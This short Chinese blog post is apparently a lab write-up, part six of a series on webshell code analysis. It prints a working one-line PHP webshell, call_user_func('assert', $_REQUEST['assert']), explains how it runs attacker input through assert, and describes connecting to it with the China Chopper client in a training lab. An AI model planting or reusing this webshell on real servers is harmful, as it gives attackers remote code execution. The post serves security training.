WebShell代码分析溯源(六)

WebShell代码分析溯源

一、一句话变形马样本

call_user_func('assert', $_REQUEST['assert']);

?>

二、代码分析

1、分析代码

call_user_func('assert', $_REQUEST['assert'])中assert是第一个被调用的函数,

其余参数是回调函数的参数,这样就构成了assert($_REQUEST['assert'])一句话木马

注: call_user_func函数,把第一个参数作为回调函数,其余参数是回调函数的参数,参考: https://www.php.net/manual/zh/function.call-user-func.php

三、漏洞环境搭建

1、这里使用在线学习平台墨者学院中的实验环境(WebShell代码分析溯源(第5题)),地址: https://www.mozhe.cn/bug/detail/RDBTOWFKOTJIODJRWlRwUjdOdlcrUT09bW96aGUmozhe

2、代码环境,下载代码

  WebShell代码分析溯源(六)_第1张图片

3、分析(上面已经分析过了)

4、使用菜刀连接

  WebShell代码分析溯源(六)_第2张图片

5、执行一些命令

  WebShell代码分析溯源(六)_第3张图片

 

   WebShell代码分析溯源(六)_第4张图片

 

你可能感兴趣的:(WebShell代码分析溯源(六))